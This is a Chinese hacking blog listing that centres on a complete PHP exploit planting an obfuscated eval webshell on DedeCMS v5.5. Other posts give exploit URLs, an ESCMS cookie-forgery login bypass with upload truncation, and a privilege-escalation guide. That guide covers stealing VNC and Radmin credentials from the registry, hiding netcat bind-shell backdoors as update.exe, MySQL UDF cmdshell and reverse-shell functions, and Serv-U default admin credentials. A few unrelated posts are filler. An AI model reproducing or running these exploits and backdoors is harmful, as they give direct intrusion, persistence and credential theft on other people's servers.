<?php
print_r('
+----------------------------------------+
dedecms v5.5 final getwebshell exploit
+----------------------------------------+
');
if ($argc < 3) {
print_r('
+----------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to dedecms
Example:
php '.$argv[0].' localhost /dedecms/
+----------------------------------------+   
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$post_a = 'plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*';
$post_b = 'needCode=aa/../../../data/mysql_error_trace';
$shell = 'data/cache/t.php';

get_send($post_a);
post_send('plus/comments_frame.php',$post_b);
$content = post_send($shell,'t=echo tojen;');

if(substr($content,9,3)=='200'){
    echo "\nShell Address is:".$host.$path.$shell;
}else{
    echo "\nError.";
}
function get_send($url){
    global $host, $path;
    $message = "GET ".$path."$url  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $fp = fsockopen($host, 80);
    if(!$fp){
        echo "\nConnect to host Error";
    }
    fputs($fp, $message);
   
    $back = '';

    while (!feof($fp))
        $back .= fread($fp, 1024);
    fclose($fp);
    return $back;
   
}
function post_send($url,$cmd){
   
    global $host, $path;
    $message = "POST ".$path."$url  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    $fp = fsockopen($host, 80);
    if(!$fp){
        echo "\nConnect to host Error";
    }
    fputs($fp, $message);
   
    $back = '';

    while (!feof($fp))
        $back .= fread($fp, 1024);
    fclose($fp);
    return $back;
}
?>

利用方法
http://xxx.com//uploads/plus/digg_frame.php?action=good&id=1024%651024&mid=*/fputs(fopen(base64_decode(ZGF0YS9jYWNoZS9jLnBocA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4));?>
http://yyy.com/uploads/plus/comments_frame.php?id=2&needCode=/../../../data/mysql_error_trace
在data/cache下生成c.php
EXP下载地址：千脑下载

Copyright © 2008

继续阅读《DedeCms v5.5 0day》的全文内容...

分类: 入侵辅助 | Tags: dedecms0DayEXP | 添加评论(7)

相关文章:

• ESCMS cookies欺骗0day(2010-2-27 14:28:18)
• Word 通杀溢出生成器（0day？）(2010-1-28 10:47:47)
• X-Blog漏洞（Fckeditor Exploit）(2010-1-26 17:56:28)
• windows最新0day 本地提权 源码+利用工具 通杀所有版本XP 2K 2K3 2K8 VISTA WIN7(2010-1-21 13:8:9)
• CityShop v5.5.8 0day注入漏洞（附带：后台获取webshell方法）(2010-1-17 22:33:53)

本来也不是什么了不得的东西，但是有些贱人就是喜欢唧唧歪歪的，没有人求着你用这个程序，我拿刀架你脖子上了？
缺点已经写的很清楚了，拿到手又说“没有后台管理”，“垃圾玩意”，“没法用”。
FLASH全站带数据库的程序数来数去就那么几套，自己没点眼力劲怪我？
有需要的在下面留下信箱吧，我发过去。

Copyright © 2008

继续阅读《bestsquareweb.com网站源码》的全文内容...

分类: 网络转载 | Tags: 源码 | 添加评论(9)

相关文章:

• 熊猫烧香源码(2009-10-14 9:39:28)
• 编译NB5.5源码(2009-10-9 11:44:21)
• 让你的免杀更长久 - 反云安全 + 反防毒 + VB源码 + 教学(2009-8-3 20:56:56)
• VC远控开源：守侯远控——白银时代(2009-2-27 14:53:8)
• Anit360deepscan 0.2付源码/反360云查杀付源码(2009-2-26 10:43:26)

版本:ESCMS V1.0 SP1 Build 1125
后台登陆验证是通过admin/check.asp实现的,看代码

<%
if Request.cookies(CookiesKey)("ES_admin")="" then
''注意这里哦,他是通过COOKIE验证ES_admin是否为空,我们可以伪造一个值,叫他不为空
''CookiesKey在inc/ESCMS_Config.asp文件中,默认为ESCMS$_SP2
Call Err_Show()
Response.End()
End if
......
%>

首先我们打开http://www.0daynet.com/admin/es_index.html

然后在COOKIE结尾加上
; ESCMS$_SP2=ES_admin=st0p;

修改,然后刷新

进后台了嘎..

然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL,看代码

......
formPath=upload.form("filepath") ''此处没有过滤
if formPath="" then
formPath="../Upfile"
end if
Dim formPath1
formPath1="Upfile/"
''在目录后加(/)
if right(formPath,1)<>"/" then
formPath=formPath&"/"
end if
for each formName in upload.file ''列出所有上传了的文件
set file=upload.file(formName) ''生成一个文件对象
if file.filesize<100 then
response.write "请先选择你要上传的图片!　[ <a href=# onclick=history.go(-1)>请重新上传</a> ]"
response.end
end if

fileExt=lcase(file.FileExt)
if CheckFileExt(fileEXT)=false then
response.write "文件格式不正确!　[ <a href=# onclick=history.go(-1)>请重新上传</a> ]"
response.end
end if

''randomize
ranNum=int(90000*rnd)+10000
Dim tempname,temppath
tempname=year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
temppath=formPath1&tempname
filename=formPath&tempname
if file.FileSize>0 then ''如果 FileSize > 0 说明有文件数据
result=file.SaveToFile(Server.mappath(filename)) ''保存文件,这里地址就会变成我们截断的SHELL名称
......

利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.

成功了,shell地址为http://www.0daynet.com/admin/diy.asp
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..

在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了,因为此版本用session来验证登陆…

Copyright © 2008

继续阅读《ESCMS cookies欺骗0day》的全文内容...

分类: 入侵辅助 | Tags: 0DayCookiesescms | 添加评论(4)

相关文章:

• DedeCms v5.5 0day(2010-3-8 12:17:51)
• Word 通杀溢出生成器（0day？）(2010-1-28 10:47:47)
• windows最新0day 本地提权 源码+利用工具 通杀所有版本XP 2K 2K3 2K8 VISTA WIN7(2010-1-21 13:8:9)
• CityShop v5.5.8 0day注入漏洞（附带：后台获取webshell方法）(2010-1-17 22:33:53)
• 金威世家服装有限公司FLASH整站 0day(2010-1-7 23:3:45)

PS：由此网站引发的不良后果（包括但不限制于：自卑、呕吐、恶心、狂笑等）由浏览此网站者自负。

        请出今天的重点：http://www.prelife.org/点进去看看先~~~~

输完名字之后点那个啥，然后看看自己前世的照片是啥样子。

汗一个先~~~

原来本大王上辈子是只猫……

囧。

外文的总归是看不懂的撒，此站提供简体中文，具体网址：http://cn.prelife.org。

此站仅供娱乐，工作闲暇之余乐一乐、和同事开开玩笑还是个很不错的选择。

Copyright © 2008

继续阅读《想知道你的前世长啥样不？》的全文内容...

分类: 网络转载 | Tags: blog | 添加评论(5)

相关文章:

• How to get accurate information about your potential customer(2010-2-18 21:45:1)
• 博客、白银时代、百度，瞎写点东西(2010-1-22 22:37:3)
• 屁啊真的是个屁啊(2010-1-1 20:51:48)
• 半个月来全做的无用功(2009-12-31 16:43:39)
• 善用Zblog的ping中心，加速博文收录。(2009-12-22 12:15:3)

Copyright © 2008

继续阅读《How to get accurate information about your potential customer》的全文内容...

分类: 网络转载 | Tags: blog | 添加评论(2)

相关文章:

• 想知道你的前世长啥样不？(2010-2-26 11:28:52)
• 博客、白银时代、百度，瞎写点东西(2010-1-22 22:37:3)
• 屁啊真的是个屁啊(2010-1-1 20:51:48)
• 半个月来全做的无用功(2009-12-31 16:43:39)
• 善用Zblog的ping中心，加速博文收录。(2009-12-22 12:15:3)

白大王在这里祝大家新年快乐，祝工作了的在新的一年里工作步步高升，奖金拿到手软。祝还在念书的在新的一年里学业有成，奖学金多多益善。

Copyright © 2008

继续阅读《新年快乐》的全文内容...

分类: 心路旅程 | Tags: 随笔 | 添加评论(5)

相关文章:

• 送几个iiscan的邀请码(2010-1-30 13:6:33)
• 博客、白银时代、百度，瞎写点东西(2010-1-22 22:37:3)
• 爱乐VPN，本大王用过的最垃圾、最烂、最差、态度最恶劣的收费VPN(2010-1-19 22:42:24)
• 本大王回来了(2009-12-19 23:8:18)
• 想把域名解析到新的二级域名下面。(2009-11-29 20:20:16)

http://v.youku.com/v_show/id_XMTQ4Nzk2NjI4.html

Copyright © 2008

继续阅读《罗玉凤——六百年没人超过我！（视频）》的全文内容...

分类: 网络转载 | Tags: 视频 | 添加评论(8)

还没有相关文章，您来说两句？

在webshell下运行360.exe

成功后，3389到服务器，按5下shift，得到一个cmd

权限只需要guest就可以执行，把exe文件放到可读可写文件夹里面，然后CMD执行就行啦。

本大王找了几个Shell，均成功提权。

下载地址：千脑下载

Copyright © 2008

继续阅读《360本地提权(Webshell下用)》的全文内容...

分类: 入侵辅助 | Tags: 360提权webshell | 添加评论(8)

相关文章:

• t00ls整理的比较有效的提权方法(2010-2-1 12:31:47)
• CityShop v5.5.8 0day注入漏洞（附带：后台获取webshell方法）(2010-1-17 22:33:53)
• 过360安全卫士的思路(2009-11-20 15:56:29)
• 和谐套装3.0,和谐和谐,专门和谐x60,xx2010,xx主动,(2009-11-12 11:53:35)
• 又见“映像劫持”（XX杀毒软件打不开、360打不开）(2009-9-12 19:48:32)

No.10 Vnc
Vnc不少老外都在用，国内用的比较少，但是几率很大。
==============
VNC提权方法
==============
利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解
注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
69    45
150   96
177   b1
243   f3
153   99
89    59
148   94
22    16

No.9 Radmin
Radmin 是一款很不错的服务器管理无论是远程桌面控制，还是文件传输，速度都很快，很方便。
Radmin 默认端口是4899，无密码。不过服务器注重的是安全，一定会修改默认端口和密码的，端口与密码读取位置：

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置

以前我们可以用海洋木马所带的功能来读出键值,然后进行转换得到hash值,但是现在有个更方便的东西,把ASP文件传到服务器上,打开可直接读出Radmin的hash和Radmin服务端口!
直接读取HASH值的小工具：千脑下载

No.8 PcAnywhere
PcAnywhere是一款用得很多的远程管理软件，他有一个重大漏洞是保存远程管理员帐号的CIF文件密码，是可以被轻易解密的，如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。思路简单而明确。
Ps:保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\文件夹下。

No.7 搜狗输入法
不少管理都使用五笔打字，不过还是有少数人喜欢用拼音，智能ABC功能少，没有全拼功能，所以大多都选择了搜狗输入法。
搜狗输入法根目录下有一个：PinyinUp.exe 是用来更新词典用的，管理员为了保存词库，有可能会把搜狗输入法安装到D盘，搜狗输入法目录默认是Everyone可读可写，直接捆绑上远控等下次重启就会上线了。

No.6 WinWebMail企业邮局系统 7i24.com
WinWebMail目录下的web必须设置everyone权限可读可写，不然邮件登陆不上去等等，所以在开始程序里找到WinWebMail快捷方式下下来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。没有删cmd组建的直接加用户。
7i24的web目录也是可写，权限为administrator。

No.5 NC反弹
nc的使用实例

c:\nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隐藏一个NetCat后门。
c:\nc.exe -p 4455 -d -L -e cmd.exe 这个命令可以让黑客利用NetCat重新返回系统，直到系统管理员在任务管理器中看见nc.exe在运行，从而发现这个后门，我们一样可以把它做的更加隐蔽。
c:\move nc.exe c:\windows\system32\Drivers\update.exe
c:\windows\systeme32\drivers\update.exe -p 4455 -d -L -e cmd.exe
系统管理员可能把特权附属于一些无害的程序，如update.exe等，黑客也可以隐藏命令行。
c:\windows\systme32\drivers\update.exe
cmd line: -l -p 4455 -d -L -e cmd.exe

c:\>
nc -l - p 80  监听80端口
nc -l -p 80 >c:\log.dat  监听80端口，并把信息记录到log.dat中
nc -v -l -p 80  监听80端口，并显示端口信息
nc -vv -l -p 80 监听80端口，显示更详细的端口信息
nc -l -p 80 -t -e cmd.exe监听本地的80端口的入站信息，同时将cmd.exe重定向到80端口，当有人连接的时候，就让

cmd.exe以telnet的形式应答。当然这个最好用在控制的肉鸡上。
nc -v ip port 扫瞄某IP的某个端口
nc -v -z ip port-port扫描某IP的端口到某端口
nc -v -z -u ip  port-port扫描某IP的某UDP端口到某UDP端口

NC下载：千脑下载

No.4 mssql(sa) mysql(root)
sa 1433对外关闭的话，可以构建注入点。
<%
strSQLServerName = "服务器ip"
strSQLDBUserName = "数据库帐号"
strSQLDBPassword = "数据库密码"
strSQLDBName = "数据库名称"
Set conn = Server.createObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
rs.close

root su.php配合udf.dll提权
第一步：将PHP文件上传到目标机上，填入你的MYSQL账号经行连接。
第二步：连接成功后，导出DLL文件，导出时请勿必注意导出路径（一般情况下对任何目录可写，无需考虑权限问题）。
                对于MYSQL5.0以上版本，你必须 将DLL导出到目标机器的系统目录(win 或 system32)，否则在下一步操作中你会看到"No paths allowed for shared library"错误。
第三步：使用SQL语句创建功能函数。语法：Create Function 函数名（函数名只能为下面列表中的其中之一） returns string soname '导出的DLL路径'；
                对于MYSQL5.0以上版本，语句中的DLL不允许带全路径，如果你在第二步中已将DLL导出到系统目录，那么你就可以省略路径 而使命令正常执行，否则你将会看到"Can't open shared library"错误。
                这时你必须将DLL重新导出到系统目录。
第四步：正确创建功能函数后，你就可以用SQL语句来使用这些功能了。语法：select 创建的函数名('参数列表')； 每个函数有不同的参数，你可以使用select 创建的函数名('help')；来获得指定函数的参数列表信息。
udf.dll功能函数说明：
cmdshell 执行cmd;
   downloader 下载者,到网上下载指定文件并保存到指定目录;
   open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
   backshell 反弹Shell;
   ProcessView 枚举系统进程;
   KillProcess 终止指定进程;
   regread 读注册表;
   regwrite 写注册表;
   shut 关机,注销,重启;
   about 说明与帮助函数;
SU.PHP下载：千脑下载
UDF工具：千脑下载

No.3 03Oday
如果支持Asp.Net组件，传Asp.Net Shell，传cmd(在Asp环境下也成功过，不过介绍上写的必须以Asp.Net运行)
使用方法:Churrasco.exe "命令"
Churrasco下载地址：千脑下载

No.2 Serv-u
漏洞是使用Serv-u本地默认管理端口，以默认管理员登陆新建域和用户来执行命令，Serv-u>3.x版本默认本地管理端口是：43958，默认管理员：LocalAdministrator，默认密码：#l@$ak#.lk;0@P，这是集成在Serv-u内部的，可以以Guest权限来进行连接，对Serv-u进行管理。

No.1 Oday
这个就算了吧，一般人根本弄不到。

Copyright © 2008

继续阅读《t00ls整理的比较有效的提权方法》的全文内容...

分类: 入侵辅助 | Tags: 提权 | 添加评论(3)

相关文章:

• 360本地提权(Webshell下用)(2010-2-2 16:19:34)
• Serv-U FTP Server v8 本地提权(2009-8-6 13:11:44)
• 落雪村提权专用免杀webshell<附源代码>(2009-2-7 11:32:1)
• 两个Servu的提权EXP(2009-2-2 15:59:29)

        网址：http://www.iiscan.com/
因为今天下午去同学家，就发这个算作是今天的更新吧。

不知道是干什么用的兄弟姐妹们就不要索求了，不知道就代表你们用不到。

需要的人直接留下信箱就OK。只有5个，先到先得。取前5个回复的信箱。

回帖时看看前面几个留言了，如果已经有5个信箱出现就不要留了，因为只有5个。

————————————————————————————————————————

拿到邀请码注册的兄弟姐妹们请自觉共享邀请码，每个账户激活之后都可以免费获得5个邀请码。

请自觉公布。

————————————————————————————————————————

还是说一下IISCAN是干嘛的吧：就是你注册一个账号，然后在后台按照他的提示来进行网站验证，验证通过之后IISCAN会自动帮你检测网站漏洞，然后以PDF或者网页的形式列举出网站的漏洞信息。

据本大王使用得出的经验，一般结果会在3天以内出来，如果站点很大的话时间会比较长。

Copyright © 2008

继续阅读《送几个iiscan的邀请码》的全文内容...

分类: 入侵辅助 | Tags: 随笔iiscan邀请码 | 添加评论(7)

相关文章:

• 新年快乐(2010-2-13 10:3:10)
• 博客、白银时代、百度，瞎写点东西(2010-1-22 22:37:3)
• 爱乐VPN，本大王用过的最垃圾、最烂、最差、态度最恶劣的收费VPN(2010-1-19 22:42:24)
• 本大王回来了(2009-12-19 23:8:18)
• 想把域名解析到新的二级域名下面。(2009-11-29 20:20:16)